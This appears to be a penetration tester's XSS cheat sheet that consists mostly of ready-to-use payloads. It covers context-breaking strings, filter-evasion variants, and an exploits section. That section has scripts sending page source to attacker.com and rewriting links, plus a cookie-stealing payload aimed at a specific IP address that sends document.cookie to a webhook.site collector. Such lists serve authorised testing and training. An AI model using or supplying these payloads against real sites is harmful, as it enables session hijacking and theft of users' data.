XSS
https://github.com/payloadbox/xss-payload-list
IMPORTANT TIP: Always look at the source code and close the current HTML tag then put JS payload.
<script>print()</script>
that will pop up the browser print dialog, which is unlikely to be blocked by any browsers
Tip: Many modern web applications utilize cross-domain IFrames to handle user input, so that even if the web form is vulnerable to XSS, it would not be a vulnerability on the main web application. This is why we are showing the value of window.origin
in the alert box, instead of a static value like 1
. In this case, the alert box would reveal the URL it is being executed on, and will confirm which form is the vulnerable one, in case an IFrame was being used.
<script>alert(window.origin)</script>
As some modern browsers may block the alert()
JavaScript function in specific locations, it may be handy to know a few other basic XSS payloads to verify the existence of XSS. One such XSS payload is <plaintext>
, which will stop rendering the HTML code that comes after it and display it as plaintext.
<script>alert(1)</script>
Check the reflected text and make a query appropriately!
<img src=a onerror=alert("xss")>
<BODY ONLOAD=javascript:alert(1)>
If alert() is being filtered
eval("ale" + "rt('xss')")
If <> brackets are fiiltered.
"onmouseover="alert(1)
If single quotes are filtered '
Use double quotes and vice versa
One stop payload!!
Awesome Context Breaking
HTML Context
Case: <tag>You searched for $input. </tag>
<svg onload=alert()>
</tag><svg onload=alert()>
Attribute Context
Case: <tag attribute="$input">
"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
"autofocus/onfocus="alert()
JavaScript Context
Case: <script> var new something = '$input'; </script>
'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>
Awesome Confirm Variants
Yep, confirm because alert is too mainstream.
confirm()
confirm``
(confirm``)
{confirm``}
[confirm``]
(((confirm)))``
co\u006efirm()
new class extends confirm``{}
[8].find(confirm)
[8].map(confirm)
[8].some(confirm)
[8].every(confirm)
[8].filter(confirm)
[8].findIndex(confirm)
Awesome Exploits
Replace all links
Array.from(document.getElementsByTagName("a")).forEach(function(i) {
i.href = "https://attacker.com";
});
Source Code Stealer
<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">
XSS with "unsafe" reflecting. Here is a valid payload. This is a markdown HTML injection
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
Reaching our own server using XSS and stealing sensitive information
http://18.225.156.202:9090/blog?blogNumber=2%22%3E%3Cimg%20src=x%20onerror=this.src=%27https://webhook.site/e20454b9-297d-47d2-bb93-9da689061414/?%27%2bdocument.cookie;%3E
Payload: 2"><img src=x onerror=this.src='https://webhook.site/e20454b9-297d-47d2-bb93-9da689061414/?'+document.cookie;>
Further,
Last updated
Was this helpful?